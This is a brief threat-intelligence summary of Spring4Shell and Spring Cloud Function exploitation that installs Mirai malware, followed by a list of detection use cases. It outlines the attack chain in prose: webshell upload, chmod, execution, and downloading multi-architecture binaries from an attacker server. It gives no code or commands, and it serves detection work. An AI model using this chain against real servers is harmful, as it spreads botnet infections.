Spring Exploits

Industry: N/A | Level: Tactical | Source: Trend Micro

Trend Micro research has kept track of exploits for Spring Core (CVE-2022-22965/Spring4Shell) and Spring Cloud Functions (CVE-2022-22963). The exploits lead to the installation of Mirai malware. The earliest exploitation attempts tracked by the security firm were in the Singapore region. Threat actors exploiting the vulnerability were able to upload a webshell to download Mirai botnet malware. Following a permission change with chmod from the downloading malware, it is then executed. Lastly, a shell script executes to download binaries from an attacker-owned server, to install compatible versions of Mirai samples with different CPU architectures onto the victim host.

• Anvilogic Scenario: Unix File Download, Modified, Executed
• Anvilogic Use Cases:
• Spring4Shell - CVE-2022-22965
• Spring-Cloud-Function - CVE-2022-22963
• Potential Web Shell
• File Download (Unix)
• File Modified for Execution
• File Execution (Unix)
• Rare shell script execution